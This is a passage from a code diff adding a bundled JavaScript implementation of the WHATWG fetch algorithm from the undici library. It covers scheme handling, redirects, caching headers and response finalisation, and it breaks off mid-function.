internalResponse’s URL list is empty, then set it to a clone of + // request’s URL list. + if (internalResponse.urlList.length === 0) { + internalResponse.urlList.push(...request.urlList) + } + + // 16. If request’s timing allow failed flag is unset, then set + // internalResponse’s timing allow passed flag. + if (!request.timingAllowFailed) { + response.timingAllowPassed = true + } + + // 17. If response is not a network error and any of the following returns + // blocked + // - should internalResponse to request be blocked as mixed content + // - should internalResponse to request be blocked by Content Security Policy + // - should internalResponse to request be blocked due to its MIME type + // - should internalResponse to request be blocked due to nosniff + // TODO + + // 18. If response’s type is "opaque", internalResponse’s status is 206, + // internalResponse’s range-requested flag is set, and request’s header + // list does not contain `Range`, then set response and internalResponse + // to a network error. + if ( + response.type === 'opaque' && + internalResponse.status === 206 && + internalResponse.rangeRequested && + !request.headers.contains('range') + ) { + response = internalResponse = makeNetworkError() + } + + // 19. If response is not a network error and either request’s method is + // `HEAD` or `CONNECT`, or internalResponse’s status is a null body status, + // set internalResponse’s body to null and disregard any enqueuing toward + // it (if any). + if ( + response.status !== 0 && + (request.method === 'HEAD' || + request.method === 'CONNECT' || + nullBodyStatus.includes(internalResponse.status)) + ) { + internalResponse.body = null + fetchParams.controller.dump = true + } + + // 20. If request’s integrity metadata is not the empty string, then: + if (request.integrity) { + // 1. Let processBodyError be this step: run fetch finale given fetchParams + // and a network error. + const processBodyError = (reason) => + fetchFinale(fetchParams, makeNetworkError(reason)) + + // 2. If request’s response tainting is "opaque", or response’s body is null, + // then run processBodyError and abort these steps. + if (request.responseTainting === 'opaque' || response.body == null) { + processBodyError(response.error) + return + } + + // 3. Let processBody given bytes be these steps: + const processBody = (bytes) => { + // 1. If bytes do not match request’s integrity metadata, + // then run processBodyError and abort these steps. [SRI] + if (!bytesMatch(bytes, request.integrity)) { + processBodyError('integrity mismatch') + return + } + + // 2. Set response’s body to bytes as a body. + response.body = safelyExtractBody(bytes)[0] + + // 3. Run fetch finale given fetchParams and response. + fetchFinale(fetchParams, response) + } + + // 4. Fully read response’s body given processBody and processBodyError. + await fullyReadBody(response.body, processBody, processBodyError) + } else { + // 21. Otherwise, run fetch finale given fetchParams and response. + fetchFinale(fetchParams, response) + } +} + +// https://fetch.spec.whatwg.org/#concept-scheme-fetch +// given a fetch params fetchParams +function schemeFetch (fetchParams) { + // Note: since the connection is destroyed on redirect, which sets fetchParams to a + // cancelled state, we do not want this condition to trigger *unless* there have been + // no redirects. See https://github.com/nodejs/undici/issues/1776 + // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. + if (isCancelled(fetchParams) && fetchParams.request.redirectCount === 0) { + return Promise.resolve(makeAppropriateNetworkError(fetchParams)) + } + + // 2. Let request be fetchParams’s request. + const { request } = fetchParams + + const { protocol: scheme } = requestCurrentURL(request) + + // 3. Switch on request’s current URL’s scheme and run the associated steps: + switch (scheme) { + case 'about:': { + // If request’s current URL’s path is the string "blank", then return a new response + // whose status message is `OK`, header list is « (`Content-Type`, `text/html;charset=utf-8`) », + // and body is the empty byte sequence as a body. + + // Otherwise, return a network error. + return Promise.resolve(makeNetworkError('about scheme is not supported')) + } + case 'blob:': { + if (!resolveObjectURL) { + resolveObjectURL = (__nccwpck_require__(4300).resolveObjectURL) + } + + // 1. Let blobURLEntry be request’s current URL’s blob URL entry. + const blobURLEntry = requestCurrentURL(request) + + // https://github.com/web-platform-tests/wpt/blob/7b0ebaccc62b566a1965396e5be7bb2bc06f841f/FileAPI/url/resources/fetch-tests.js#L52-L56 + // Buffer.resolveObjectURL does not ignore URL queries. + if (blobURLEntry.search.length !== 0) { + return Promise.resolve(makeNetworkError('NetworkError when attempting to fetch resource.')) + } + + const blobURLEntryObject = resolveObjectURL(blobURLEntry.toString()) + + // 2. If request’s method is not `GET`, blobURLEntry is null, or blobURLEntry’s + // object is not a Blob object, then return a network error. + if (request.method !== 'GET' || !isBlobLike(blobURLEntryObject)) { + return Promise.resolve(makeNetworkError('invalid method')) + } + + // 3. Let bodyWithType be the result of safely extracting blobURLEntry’s object. + const bodyWithType = safelyExtractBody(blobURLEntryObject) + + // 4. Let body be bodyWithType’s body. + const body = bodyWithType[0] + + // 5. Let length be body’s length, serialized and isomorphic encoded. + const length = isomorphicEncode(`${body.length}`) + + // 6. Let type be bodyWithType’s type if it is non-null; otherwise the empty byte sequence. + const type = bodyWithType[1] ?? '' + + // 7. Return a new response whose status message is `OK`, header list is + // « (`Content-Length`, length), (`Content-Type`, type) », and body is body. + const response = makeResponse({ + statusText: 'OK', + headersList: [ + ['content-length', { name: 'Content-Length', value: length }], + ['content-type', { name: 'Content-Type', value: type }] + ] + }) + + response.body = body + + return Promise.resolve(response) + } + case 'data:': { + // 1. Let dataURLStruct be the result of running the + // data: URL processor on request’s current URL. + const currentURL = requestCurrentURL(request) + const dataURLStruct = dataURLProcessor(currentURL) + + // 2. If dataURLStruct is failure, then return a + // network error. + if (dataURLStruct === 'failure') { + return Promise.resolve(makeNetworkError('failed to fetch the data URL')) + } + + // 3. Let mimeType be dataURLStruct’s MIME type, serialized. + const mimeType = serializeAMimeType(dataURLStruct.mimeType) + + // 4. Return a response whose status message is `OK`, + // header list is « (`Content-Type`, mimeType) », + // and body is dataURLStruct’s body as a body. + return Promise.resolve(makeResponse({ + statusText: 'OK', + headersList: [ + ['content-type', { name: 'Content-Type', value: mimeType }] + ], + body: safelyExtractBody(dataURLStruct.body)[0] + })) + } + case 'file:': { + // For now, unfortunate as it is, file URLs are left as an exercise for the reader. + // When in doubt, return a network error. + return Promise.resolve(makeNetworkError('not implemented... yet...')) + } + case 'http:': + case 'https:': { + // Return the result of running HTTP fetch given fetchParams. + + return httpFetch(fetchParams) + .catch((err) => makeNetworkError(err)) + } + default: { + return Promise.resolve(makeNetworkError('unknown scheme')) + } + } +} + +// https://fetch.spec.whatwg.org/#finalize-response +function finalizeResponse (fetchParams, response) { + // 1. Set fetchParams’s request’s done flag. + fetchParams.request.done = true + + // 2, If fetchParams’s process response done is not null, then queue a fetch + // task to run fetchParams’s process response done given response, with + // fetchParams’s task destination. + if (fetchParams.processResponseDone != null) { + queueMicrotask(() => fetchParams.processResponseDone(response)) + } +} + +// https://fetch.spec.whatwg.org/#fetch-finale +function fetchFinale (fetchParams, response) { + // 1. If response is a network error, then: + if (response.type === 'error') { + // 1. Set response’s URL list to « fetchParams’s request’s URL list[0] ». + response.urlList = [fetchParams.request.urlList[0]] + + // 2. Set response’s timing info to the result of creating an opaque timing + // info for fetchParams’s timing info. + response.timingInfo = createOpaqueTimingInfo({ + startTime: fetchParams.timingInfo.startTime + }) + } + + // 2. Let processResponseEndOfBody be the following steps: + const processResponseEndOfBody = () => { + // 1. Set fetchParams’s request’s done flag. + fetchParams.request.done = true + + // If fetchParams’s process response end-of-body is not null, + // then queue a fetch task to run fetchParams’s process response + // end-of-body given response with fetchParams’s task destination. + if (fetchParams.processResponseEndOfBody != null) { + queueMicrotask(() => fetchParams.processResponseEndOfBody(response)) + } + } + + // 3. If fetchParams’s process response is non-null, then queue a fetch task + // to run fetchParams’s process response given response, with fetchParams’s + // task destination. + if (fetchParams.processResponse != null) { + queueMicrotask(() => fetchParams.processResponse(response)) + } + + // 4. If response’s body is null, then run processResponseEndOfBody. + if (response.body == null) { + processResponseEndOfBody() + } else { + // 5. Otherwise: + + // 1. Let transformStream be a new a TransformStream. + + // 2. Let identityTransformAlgorithm be an algorithm which, given chunk, + // enqueues chunk in transformStream. + const identityTransformAlgorithm = (chunk, controller) => { + controller.enqueue(chunk) + } + + // 3. Set up transformStream with transformAlgorithm set to identityTransformAlgorithm + // and flushAlgorithm set to processResponseEndOfBody. + const transformStream = new TransformStream({ + start () {}, + transform: identityTransformAlgorithm, + flush: processResponseEndOfBody + }, { + size () { + return 1 + } + }, { + size () { + return 1 + } + }) + + // 4. Set response’s body to the result of piping response’s body through transformStream. + response.body = { stream: response.body.stream.pipeThrough(transformStream) } + } + + // 6. If fetchParams’s process response consume body is non-null, then: + if (fetchParams.processResponseConsumeBody != null) { + // 1. Let processBody given nullOrBytes be this step: run fetchParams’s + // process response consume body given response and nullOrBytes. + const processBody = (nullOrBytes) => fetchParams.processResponseConsumeBody(response, nullOrBytes) + + // 2. Let processBodyError be this step: run fetchParams’s process + // response consume body given response and failure. + const processBodyError = (failure) => fetchParams.processResponseConsumeBody(response, failure) + + // 3. If response’s body is null, then queue a fetch task to run processBody + // given null, with fetchParams’s task destination. + if (response.body == null) { + queueMicrotask(() => processBody(null)) + } else { + // 4. Otherwise, fully read response’s body given processBody, processBodyError, + // and fetchParams’s task destination. + return fullyReadBody(response.body, processBody, processBodyError) + } + return Promise.resolve() + } +} + +// https://fetch.spec.whatwg.org/#http-fetch +async function httpFetch (fetchParams) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let response be null. + let response = null + + // 3. Let actualResponse be null. + let actualResponse = null + + // 4. Let timingInfo be fetchParams’s timing info. + const timingInfo = fetchParams.timingInfo + + // 5. If request’s service-workers mode is "all", then: + if (request.serviceWorkers === 'all') { + // TODO + } + + // 6. If response is null, then: + if (response === null) { + // 1. If makeCORSPreflight is true and one of these conditions is true: + // TODO + + // 2. If request’s redirect mode is "follow", then set request’s + // service-workers mode to "none". + if (request.redirect === 'follow') { + request.serviceWorkers = 'none' + } + + // 3. Set response and actualResponse to the result of running + // HTTP-network-or-cache fetch given fetchParams. + actualResponse = response = await httpNetworkOrCacheFetch(fetchParams) + + // 4. If request’s response tainting is "cors" and a CORS check + // for request and response returns failure, then return a network error. + if ( + request.responseTainting === 'cors' && + corsCheck(request, response) === 'failure' + ) { + return makeNetworkError('cors failure') + } + + // 5. If the TAO check for request and response returns failure, then set + // request’s timing allow failed flag. + if (TAOCheck(request, response) === 'failure') { + request.timingAllowFailed = true + } + } + + // 7. If either request’s response tainting or response’s type + // is "opaque", and the cross-origin resource policy check with + // request’s origin, request’s client, request’s destination, + // and actualResponse returns blocked, then return a network error. + if ( + (request.responseTainting === 'opaque' || response.type === 'opaque') && + crossOriginResourcePolicyCheck( + request.origin, + request.client, + request.destination, + actualResponse + ) === 'blocked' + ) { + return makeNetworkError('blocked') + } + + // 8. If actualResponse’s status is a redirect status, then: + if (redirectStatusSet.has(actualResponse.status)) { + // 1. If actualResponse’s status is not 303, request’s body is not null, + // and the connection uses HTTP/2, then user agents may, and are even + // encouraged to, transmit an RST_STREAM frame. + // See, https://github.com/whatwg/fetch/issues/1288 + if (request.redirect !== 'manual') { + fetchParams.controller.connection.destroy() + } + + // 2. Switch on request’s redirect mode: + if (request.redirect === 'error') { + // Set response to a network error. + response = makeNetworkError('unexpected redirect') + } else if (request.redirect === 'manual') { + // Set response to an opaque-redirect filtered response whose internal + // response is actualResponse. + // NOTE(spec): On the web this would return an `opaqueredirect` response, + // but that doesn't make sense server side. + // See https://github.com/nodejs/undici/issues/1193. + response = actualResponse + } else if (request.redirect === 'follow') { + // Set response to the result of running HTTP-redirect fetch given + // fetchParams and response. + response = await httpRedirectFetch(fetchParams, response) + } else { + assert(false) + } + } + + // 9. Set response’s timing info to timingInfo. + response.timingInfo = timingInfo + + // 10. Return response. + return response +} + +// https://fetch.spec.whatwg.org/#http-redirect-fetch +function httpRedirectFetch (fetchParams, response) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let actualResponse be response, if response is not a filtered response, + // and response’s internal response otherwise. + const actualResponse = response.internalResponse + ? response.internalResponse + : response + + // 3. Let locationURL be actualResponse’s location URL given request’s current + // URL’s fragment. + let locationURL + + try { + locationURL = responseLocationURL( + actualResponse, + requestCurrentURL(request).hash + ) + + // 4. If locationURL is null, then return response. + if (locationURL == null) { + return response + } + } catch (err) { + // 5. If locationURL is failure, then return a network error. + return Promise.resolve(makeNetworkError(err)) + } + + // 6. If locationURL’s scheme is not an HTTP(S) scheme, then return a network + // error. + if (!urlIsHttpHttpsScheme(locationURL)) { + return Promise.resolve(makeNetworkError('URL scheme must be a HTTP(S) scheme')) + } + + // 7. If request’s redirect count is 20, then return a network error. + if (request.redirectCount === 20) { + return Promise.resolve(makeNetworkError('redirect count exceeded')) + } + + // 8. Increase request’s redirect count by 1. + request.redirectCount += 1 + + // 9. If request’s mode is "cors", locationURL includes credentials, and + // request’s origin is not same origin with locationURL’s origin, then return + // a network error. + if ( + request.mode === 'cors' && + (locationURL.username || locationURL.password) && + !sameOrigin(request, locationURL) + ) { + return Promise.resolve(makeNetworkError('cross origin not allowed for request mode "cors"')) + } + + // 10. If request’s response tainting is "cors" and locationURL includes + // credentials, then return a network error. + if ( + request.responseTainting === 'cors' && + (locationURL.username || locationURL.password) + ) { + return Promise.resolve(makeNetworkError( + 'URL cannot contain credentials for request mode "cors"' + )) + } + + // 11. If actualResponse’s status is not 303, request’s body is non-null, + // and request’s body’s source is null, then return a network error. + if ( + actualResponse.status !== 303 && + request.body != null && + request.body.source == null + ) { + return Promise.resolve(makeNetworkError()) + } + + // 12. If one of the following is true + // - actualResponse’s status is 301 or 302 and request’s method is `POST` + // - actualResponse’s status is 303 and request’s method is not `GET` or `HEAD` + if ( + ([301, 302].includes(actualResponse.status) && request.method === 'POST') || + (actualResponse.status === 303 && + !GET_OR_HEAD.includes(request.method)) + ) { + // then: + // 1. Set request’s method to `GET` and request’s body to null. + request.method = 'GET' + request.body = null + + // 2. For each headerName of request-body-header name, delete headerName from + // request’s header list. + for (const headerName of requestBodyHeader) { + request.headersList.delete(headerName) + } + } + + // 13. If request’s current URL’s origin is not same origin with locationURL’s + // origin, then for each headerName of CORS non-wildcard request-header name, + // delete headerName from request’s header list. + if (!sameOrigin(requestCurrentURL(request), locationURL)) { + // https://fetch.spec.whatwg.org/#cors-non-wildcard-request-header-name + request.headersList.delete('authorization') + + // https://fetch.spec.whatwg.org/#authentication-entries + request.headersList.delete('proxy-authorization', true) + + // "Cookie" and "Host" are forbidden request-headers, which undici doesn't implement. + request.headersList.delete('cookie') + request.headersList.delete('host') + } + + // 14. If request’s body is non-null, then set request’s body to the first return + // value of safely extracting request’s body’s source. + if (request.body != null) { + assert(request.body.source != null) + request.body = safelyExtractBody(request.body.source)[0] + } + + // 15. Let timingInfo be fetchParams’s timing info. + const timingInfo = fetchParams.timingInfo + + // 16. Set timingInfo’s redirect end time and post-redirect start time to the + // coarsened shared current time given fetchParams’s cross-origin isolated + // capability. + timingInfo.redirectEndTime = timingInfo.postRedirectStartTime = + coarsenedSharedCurrentTime(fetchParams.crossOriginIsolatedCapability) + + // 17. If timingInfo’s redirect start time is 0, then set timingInfo’s + // redirect start time to timingInfo’s start time. + if (timingInfo.redirectStartTime === 0) { + timingInfo.redirectStartTime = timingInfo.startTime + } + + // 18. Append locationURL to request’s URL list. + request.urlList.push(locationURL) + + // 19. Invoke set request’s referrer policy on redirect on request and + // actualResponse. + setRequestReferrerPolicyOnRedirect(request, actualResponse) + + // 20. Return the result of running main fetch given fetchParams and true. + return mainFetch(fetchParams, true) +} + +// https://fetch.spec.whatwg.org/#http-network-or-cache-fetch +async function httpNetworkOrCacheFetch ( + fetchParams, + isAuthenticationFetch = false, + isNewConnectionFetch = false +) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let httpFetchParams be null. + let httpFetchParams = null + + // 3. Let httpRequest be null. + let httpRequest = null + + // 4. Let response be null. + let response = null + + // 5. Let storedResponse be null. + // TODO: cache + + // 6. Let httpCache be null. + const httpCache = null + + // 7. Let the revalidatingFlag be unset. + const revalidatingFlag = false + + // 8. Run these steps, but abort when the ongoing fetch is terminated: + + // 1. If request’s window is "no-window" and request’s redirect mode is + // "error", then set httpFetchParams to fetchParams and httpRequest to + // request. + if (request.window === 'no-window' && request.redirect === 'error') { + httpFetchParams = fetchParams + httpRequest = request + } else { + // Otherwise: + + // 1. Set httpRequest to a clone of request. + httpRequest = makeRequest(request) + + // 2. Set httpFetchParams to a copy of fetchParams. + httpFetchParams = { ...fetchParams } + + // 3. Set httpFetchParams’s request to httpRequest. + httpFetchParams.request = httpRequest + } + + // 3. Let includeCredentials be true if one of + const includeCredentials = + request.credentials === 'include' || + (request.credentials === 'same-origin' && + request.responseTainting === 'basic') + + // 4. Let contentLength be httpRequest’s body’s length, if httpRequest’s + // body is non-null; otherwise null. + const contentLength = httpRequest.body ? httpRequest.body.length : null + + // 5. Let contentLengthHeaderValue be null. + let contentLengthHeaderValue = null + + // 6. If httpRequest’s body is null and httpRequest’s method is `POST` or + // `PUT`, then set contentLengthHeaderValue to `0`. + if ( + httpRequest.body == null && + ['POST', 'PUT'].includes(httpRequest.method) + ) { + contentLengthHeaderValue = '0' + } + + // 7. If contentLength is non-null, then set contentLengthHeaderValue to + // contentLength, serialized and isomorphic encoded. + if (contentLength != null) { + contentLengthHeaderValue = isomorphicEncode(`${contentLength}`) + } + + // 8. If contentLengthHeaderValue is non-null, then append + // `Content-Length`/contentLengthHeaderValue to httpRequest’s header + // list. + if (contentLengthHeaderValue != null) { + httpRequest.headersList.append('content-length', contentLengthHeaderValue) + } + + // 9. If contentLengthHeaderValue is non-null, then append (`Content-Length`, + // contentLengthHeaderValue) to httpRequest’s header list. + + // 10. If contentLength is non-null and httpRequest’s keepalive is true, + // then: + if (contentLength != null && httpRequest.keepalive) { + // NOTE: keepalive is a noop outside of browser context. + } + + // 11. If httpRequest’s referrer is a URL, then append + // `Referer`/httpRequest’s referrer, serialized and isomorphic encoded, + // to httpRequest’s header list. + if (httpRequest.referrer instanceof URL) { + httpRequest.headersList.append('referer', isomorphicEncode(httpRequest.referrer.href)) + } + + // 12. Append a request `Origin` header for httpRequest. + appendRequestOriginHeader(httpRequest) + + // 13. Append the Fetch metadata headers for httpRequest. [FETCH-METADATA] + appendFetchMetadata(httpRequest) + + // 14. If httpRequest’s header list does not contain `User-Agent`, then + // user agents should append `User-Agent`/default `User-Agent` value to + // httpRequest’s header list. + if (!httpRequest.headersList.contains('user-agent')) { + httpRequest.headersList.append('user-agent', typeof esbuildDetection === 'undefined' ? 'undici' : 'node') + } + + // 15. If httpRequest’s cache mode is "default" and httpRequest’s header + // list contains `If-Modified-Since`, `If-None-Match`, + // `If-Unmodified-Since`, `If-Match`, or `If-Range`, then set + // httpRequest’s cache mode to "no-store". + if ( + httpRequest.cache === 'default' && + (httpRequest.headersList.contains('if-modified-since') || + httpRequest.headersList.contains('if-none-match') || + httpRequest.headersList.contains('if-unmodified-since') || + httpRequest.headersList.contains('if-match') || + httpRequest.headersList.contains('if-range')) + ) { + httpRequest.cache = 'no-store' + } + + // 16. If httpRequest’s cache mode is "no-cache", httpRequest’s prevent + // no-cache cache-control header modification flag is unset, and + // httpRequest’s header list does not contain `Cache-Control`, then append + // `Cache-Control`/`max-age=0` to httpRequest’s header list. + if ( + httpRequest.cache === 'no-cache' && + !httpRequest.preventNoCacheCacheControlHeaderModification && + !httpRequest.headersList.contains('cache-control') + ) { + httpRequest.headersList.append('cache-control', 'max-age=0') + } + + // 17. If httpRequest’s cache mode is "no-store" or "reload", then: + if (httpRequest.cache === 'no-store' || httpRequest.cache === 'reload') { + // 1. If httpRequest’s header list does not contain `Pragma`, then append + // `Pragma`/`no-cache` to httpRequest’s header list. + if (!httpRequest.headersList.contains('pragma')) { + httpRequest.headersList.append('pragma', 'no-cache') + } + + // 2. If httpRequest’s header list does not contain `Cache-Control`, + // then append `Cache-Control`/`no-cache` to httpRequest’s header list. + if (!httpRequest.headersList.contains('cache-control')) { + httpRequest.headersList.append('cache-control', 'no-cache') + } + } + + // 18. If httpRequest’s header list contains `Range`, then append + // `Accept-Encoding`/`identity` to httpRequest’s header list. + if (httpRequest.headersList.contains('range')) { + httpRequest.headersList.append('accept-encoding', 'identity') + } + + // 19. Modify httpRequest’s header list per HTTP. Do not append a given + // header if httpRequest’s header list contains that header’s name. + // TODO: https://github.com/whatwg/fetch/issues/1285#issuecomment-896560129 + if (!httpRequest.headersList.contains('accept-encoding')) { + if (urlHasHttpsScheme(requestCurrentURL(httpRequest))) { + httpRequest.headersList.append('accept-encoding', 'br, gzip, deflate') + } else { + httpRequest.headersList.append('accept-encoding', 'gzip, deflate') + } + } + + httpRequest.headersList.delete('host') + + // 20. If includeCredentials is true, then: + if (includeCredentials) { + // 1. If the user agent is not configured to block cookies for httpRequest + // (see section 7 of [COOKIES]), then: + // TODO: credentials + // 2. If httpRequest’s header list does not contain `Authorization`, then: + // TODO: credentials + } + + // 21. If there’s a proxy-authentication entry, use it as appropriate. + // TODO: proxy-authentication + + // 22. Set httpCache to the result of determining the HTTP cache + // partition, given httpRequest. + // TODO: cache + + // 23. If httpCache is null, then set httpRequest’s cache mode to + // "no-store". + if (httpCache == null) { + httpRequest.cache = 'no-store' + } + + // 24. If httpRequest’s cache mode is neither "no-store" nor "reload", + // then: + if (httpRequest.mode !== 'no-store' && httpRequest.mode !== 'reload') { + // TODO: cache + } + + // 9. If aborted, then return the appropriate network error for fetchParams. + // TODO + + // 10. If response is null, then: + if (response == null) { + // 1. If httpRequest’s cache mode is "only-if-cached", then return a + // network error. + if (httpRequest.mode === 'only-if-cached') { + return makeNetworkError('only if cached') + } + + // 2. Let forwardResponse be the result of running HTTP-network fetch + // given httpFetchParams, includeCredentials, and isNewConnectionFetch. + const forwardResponse = await httpNetworkFetch( + httpFetchParams, + includeCredentials, + isNewConnectionFetch + ) + + // 3. If httpRequest’s method is unsafe and forwardResponse’s status is + // in the range 200 to 399, inclusive, invalidate appropriate stored + // responses in httpCache, as per the "Invalidation" chapter of HTTP + // Caching, and set storedResponse to null. [HTTP-CACHING] + if ( + !safeMethodsSet.has(httpRequest.method) && + forwardResponse.status >= 200 && + forwardResponse.status <= 399 + ) { + // TODO: cache + } + + // 4. If the revalidatingFlag is set and forwardResponse’s status is 304, + // then: + if (revalidatingFlag && forwardResponse.status === 304) { + // TODO: cache + } + + // 5. If response is null, then: + if (response == null) { + // 1. Set response to forwardResponse. + response = forwardResponse + + // 2. Store httpRequest and forwardResponse in httpCache, as per the + // "Storing Responses in Caches" chapter of HTTP Caching. [HTTP-CACHING] + // TODO: cache + } + } + + // 11. Set response’s URL list to a clone of httpRequest’s URL list. + response.urlList = [...httpRequest.urlList] + + // 12. If httpRequest’s header list contains `Range`, then set response’s + // range-requested flag. + if (httpRequest.headersList.contains('range')) { + response.rangeRequested = true + } + + // 13. Set response’s request-includes-credentials to includeCredentials. + response.requestIncludesCredentials = includeCredentials + + // 14. If response’s status is 401, httpRequest’s response tainting is not + // "cors", includeCredentials is true, and request’s window is an environment + // settings object, then: + // TODO + + // 15. If response’s status is 407, then: + if (response.status === 407) { + // 1. If request’s window is "no-window", then return a network error. + if (request.window === 'no-window') { + return makeNetworkError() + } + + // 2. ??? + + // 3. If fetchParams is canceled, then return the appropriate network error for fetchParams. + if (isCancelled(fetchParams)) { + return makeAppropriateNetworkError(fetchParams) + } + + // 4. Prompt the end user as appropriate in request’s window and store + // the result as a proxy-authentication entry. [HTTP-AUTH] + // TODO: Invoke some kind of callback? + + // 5. Set response to the result of running HTTP-network-or-cache fetch given + // fetchParams. + // TODO + return makeNetworkError('proxy authentication required') + } + + // 16. If all of the following are true + if ( + // response’s status is 421 + response.status === 421 && + // isNewConnectionFetch is false + !isNewConnectionFetch && + // request’s body is null, or request’s body is non-null and request’s body’s source is non-null + (request.body == null || request.body.source != null) + ) { + // then: + + // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. + if (isCancelled(fetchParams)) { + return makeAppropriateNetworkError(fetchParams) + } + + // 2. Set response to the result of running HTTP-network-or-cache + // fetch given fetchParams, isAuthenticationFetch, and true. + + // TODO (spec): The spec doesn't specify this but we need to cancel + // the active response before we can start a new one. + // https://github.com/whatwg/fetch/issues/1293 + fetchParams.controller.connection.destroy() + + response = await httpNetworkOrCacheFetch( + fetchParams, + isAuthenticationFetch, + true + ) + } + + // 17. If isAuthenticationFetch is true, then create an authentication entry + if (isAuthenticationFetch) { + // TODO + } + + // 18. Return response. + return response +} + +// https://fetch.spec.whatwg.org/#http-network-fetch +async function httpNetworkFetch ( + fetchParams, + includeCredentials = false, + forceNewConnection = false +) { + assert(!fetchParams.controller.connection || fetchParams.controller.connection.destroyed) + + fetchParams.controller.connection = { + abort: null, + destroyed: false, + destroy (err) { + if (!this.destroyed) { + this.destroyed = true + this.abort?.(err ?? new DOMException('The operation was aborted.', 'AbortError')) + } + } + } + + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let response be null. + let response = null + + // 3. Let timingInfo be fetchParams’s timing info. + const timingInfo = fetchParams.timingInfo + + // 4. Let httpCache be the result of determining the HTTP cache partition, + // given request. + // TODO: cache + const httpCache = null + + // 5. If httpCache is null, then set request’s cache mode to "no-store". + if (httpCache == null) { + request.cache = 'no-store' + } + + // 6. Let networkPartitionKey be the result of determining the network + // partition key given request. + // TODO + + // 7. Let newConnection be "yes" if forceNewConnection is true; otherwise + // "no". + const newConnection = forceNewConnection ? 'yes' : 'no' // eslint-disable-line no-unused-vars + + // 8. Switch on request’s mode: + if (request.mode === 'websocket') { + // Let connection be the result of obtaining a WebSocket connection, + // given request’s current URL. + // TODO + } else { + // Let connection be the result of obtaining a connection, given + // networkPartitionKey, request’s current URL’s origin, + // includeCredentials, and forceNewConnection. + // TODO + } + + // 9. Run these steps, but abort when the ongoing fetch is terminated: + + // 1. If connection is failure, then return a network error. + + // 2. Set timingInfo’s final connection timing info to the result of + // calling clamp and coarsen connection timing info with connection’s + // timing info, timingInfo’s post-redirect start time, and fetchParams’s + // cross-origin isolated capability. + + // 3. If connection is not an HTTP/2 connection, request’s body is non-null, + // and request’s body’s source is null, then append (`Transfer-Encoding`, + // `chunked`) to request’s header list. + + // 4. Set timingInfo’s final network-request start time to the coarsened + // shared current time given fetchParams’s cross-origin isolated + // capability. + + // 5. Set response to the result of making an HTTP request over connection + // using request with the following caveats: + + // - Follow the relevant requirements from HTTP. [HTTP] [HTTP-SEMANTICS] + // [HTTP-COND] [HTTP-CACHING] [HTTP-AUTH] + + // - If request’s body is non-null, and request’s body’s source is null, + // then the user agent may have a buffer of up to 64 kibibytes and store + // a part of request’s body in that buffer. If the user agent reads from + // request’s body beyond that buffer’s size and the user agent needs to + // resend request, then instead return a network error. + + // - Set timingInfo’s final network-response start time to the coarsened + // shared current time given fetchParams’s cross-origin isolated capability, + // immediately after the user agent’s HTTP parser receives the first byte + // of the response (e.g., frame header bytes for HTTP/2 or response status + // line for HTTP/1.x). + + // - Wait until all the headers are transmitted. + + // - Any responses whose status is in the range 100 to 199, inclusive, + // and is not 101, are to be ignored, except for the purposes of setting + // timingInfo’s final network-response start time above. + + // - If request’s header list contains `Transfer-Encoding`/`chunked` and + // response is transferred via HTTP/1.0 or older, then return a network + // error. + + // - If the HTTP request results in a TLS client certificate dialog, then: + + // 1. If request’s window is an environment settings object, make the + // dialog available in request’s window. + + // 2. Otherwise, return a network error. + + // To transmit request’s body body, run these steps: + let requestBody = null + // 1. If body is null and fetchParams’s process request end-of-body is + // non-null, then queue a fetch task given fetchParams’s process request + // end-of-body and fetchParams’s task destination. + if (request.body == null && fetchParams.processRequestEndOfBody) { + queueMicrotask(() => fetchParams.processRequestEndOfBody()) + } else if (request.body != null) { + // 2. Otherwise, if body is non-null: + + // 1. Let processBodyChunk given bytes be these steps: + const processBodyChunk = async function * (bytes) { + // 1. If the ongoing fetch is terminated, then abort these steps. + if (isCancelled(fetchParams)) { + return + } + + // 2. Run this step in parallel: transmit bytes. + yield bytes + + // 3. If fetchParams’s process request body is non-null, then run + // fetchParams’s process request body given bytes’s length. + fetchParams.processRequestBodyChunkLength?.(bytes.byteLength) + } + + // 2. Let processEndOfBody be these steps: + const processEndOfBody = () => { + // 1. If fetchParams is canceled, then abort these steps. + if (isCancelled(fetchParams)) { + return + } + + // 2. If fetchParams’s process request end-of-body is non-null, + // then run fetchParams’s process request end-of-body. + if (fetchParams.processRequestEndOfBody) { + fetchParams.processRequestEndOfBody() + } + } + + // 3. Let processBodyError given e be these steps: + const processBodyError = (e) => { + // 1. If fetchParams is canceled, then abort these steps. + if (isCancelled(fetchParams)) { + return + } + + // 2. If e is an "AbortError" DOMException, then abort fetchParams’s controller. + if (e.name === 'AbortError') { + fetchParams.controller.abort() + } else { + fetchParams.controller.terminate(e) + } + } + + // 4. Incrementally read request’s body given processBodyChunk, processEndOfBody, + // processBodyError, and fetchParams’s task destination. + requestBody = (async function * () { + try { + for await (const bytes of request.body.stream) { + yield * processBodyChunk(bytes) + } + processEndOfBody() + } catch (err) { + processBodyError(err) + } + })() + } + + try { + // socket is only provided for websockets + const { body, status, statusText, headersList, socket } = await dispatch({ body: requestBody }) + + if (socket) { + response = makeResponse({ status, statusText, headersList, socket }) + } else { + const iterator = body[Symbol.asyncIterator]() + fetchParams.controller.next = () => iterator.next() + + response = makeResponse({ status, statusText, headersList }) + } + } catch (err) { + // 10. If aborted, then: + if (err.name === 'AbortError') { + // 1. If connection uses HTTP/2, then transmit an RST_STREAM frame. + fetchParams.controller.connection.destroy() + + // 2. Return the appropriate network error for fetchParams. + return makeAppropriateNetworkError(fetchParams, err) + } + + return makeNetworkError(err) + } + + // 11. Let pullAlgorithm be an action that resumes the ongoing fetch + // if it is suspended. + const pullAlgorithm = () => { + fetchParams.controller.resume() + } + + // 12. Let cancelAlgorithm be an algorithm that aborts fetchParams’s + // controller with reason, given reason. + const cancelAlgorithm = (reason) => { + fetchParams.controller.abort(reason) + } + + // 13. Let highWaterMark be a non-negative, non-NaN number, chosen by + // the user agent. + // TODO + + // 14. Let sizeAlgorithm be an algorithm that accepts a chunk object + // and returns a non-negative, non-NaN, non-infinite number, chosen by the user agent. + // TODO + + // 15. Let stream be a new ReadableStream. + // 16. Set up stream with pullAlgorithm set to pullAlgorithm, + // cancelAlgorithm set to cancelAlgorithm, highWaterMark set 